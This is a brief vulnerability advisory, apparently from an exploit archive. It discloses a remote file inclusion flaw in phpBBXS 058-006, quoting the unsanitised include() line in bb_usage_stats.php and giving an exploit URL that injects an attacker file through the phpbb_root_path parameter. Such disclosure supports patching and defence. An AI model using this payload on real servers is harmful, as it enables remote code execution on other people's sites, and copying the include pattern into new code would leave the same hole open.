phpBBXS 058-006 - RFI


[o] phpBBXS 058-006 Remote File Inclusion Vulnerability
Software : phpBBXS version 058-006
Vendor : http://www.phpbbxs.nl/
Author : NoGe


[o] Vulnerable file
bb_usage_stats/include/bb_usage_stats.php
include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);


[o] Exploit
http://localhost/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=[evilcode]


[o] Publish
http://www.securityfocus.com/bid/20046